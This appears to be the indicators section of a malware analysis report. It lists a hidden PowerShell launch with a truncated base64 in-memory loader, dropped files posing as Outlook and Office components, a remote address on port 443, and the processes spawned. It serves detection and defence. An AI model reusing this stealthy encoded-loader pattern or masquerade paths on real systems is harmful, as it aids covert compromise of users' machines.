Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -enc JAB0AFEAYwB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACwAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiA...
- %LOCALAPPDATA%\microsoft\forms\frmdata64.dat
- %TEMP%\outlook logging\firstrun.log
- %WINDIR%\inf\outlook\outlperf.h
- %WINDIR%\inf\outlook\0009\outlperf.ini
- '10.#0.14.3':443
- ClassName: 'mspim_wnd32' WindowName: 'Microsoft Outlook'
- ClassName: 'rencat' WindowName: ''
- '%ProgramFiles%\microsoft office\office14\outlook.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -s -NoLogo -NoProfile
- '%WINDIR%\microsoft.net\framework\v2.0.50727\dw20.exe' -x -s 1292